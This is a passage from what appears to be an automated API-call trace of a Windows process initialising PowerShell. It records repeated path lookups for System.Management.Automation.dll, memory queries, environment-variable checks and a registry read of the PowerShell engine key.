lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.612] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0092.617] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.617] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.617] CoTaskMemFree (pv=0x2e4120) [0092.622] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0092.638] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.639] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.639] CoTaskMemFree (pv=0x2e4120) [0092.640] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.640] CoTaskMemFree (pv=0x2e4120) [0092.642] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.643] CoTaskMemFree (pv=0x2e4120) [0092.647] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.647] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.647] CoTaskMemFree (pv=0x2e4120) [0092.649] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.650] CoTaskMemFree (pv=0x2e4120) [0092.650] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.650] CoTaskMemFree (pv=0x2e4120) [0092.655] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0092.660] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0092.729] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0092.735] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.735] CoTaskMemFree (pv=0x2e4120) [0092.831] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2e4560 [0092.832] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2e4670 [0093.003] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0093.089] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.092] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.092] VirtualQuery (in: lpAddress=0x16a660, lpBuffer=0x16b520, dwLength=0x30 | out: lpBuffer=0x16b520*(BaseAddress=0x16a000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.123] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.123] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.123] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.123] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.123] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.123] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.123] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.123] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.124] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.125] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.125] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.125] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.125] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.125] VirtualQuery (in: lpAddress=0x16bc10, lpBuffer=0x16cad0, dwLength=0x30 | out: lpBuffer=0x16cad0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.127] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.129] CoTaskMemFree (pv=0x2e4780) [0093.135] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.135] CoTaskMemFree (pv=0x2e4780) [0093.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0093.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0093.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0093.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0093.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0093.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0093.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0093.209] VirtualQuery (in: lpAddress=0x16bec0, lpBuffer=0x16cd80, dwLength=0x30 | out: lpBuffer=0x16cd80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0093.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0093.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0093.214] VirtualQuery (in: lpAddress=0x16bec0, lpBuffer=0x16cd80, dwLength=0x30 | out: lpBuffer=0x16cd80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.214] VirtualQuery (in: lpAddress=0x16b710, lpBuffer=0x16c5d0, dwLength=0x30 | out: lpBuffer=0x16c5d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.215] VirtualQuery (in: lpAddress=0x16b710, lpBuffer=0x16c5d0, dwLength=0x30 | out: lpBuffer=0x16c5d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.216] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dd18 | out: phkResult=0x16dd18*=0x3c4) returned 0x0 [0093.216] RegQueryValueExW (in: hKey=0x3c4, 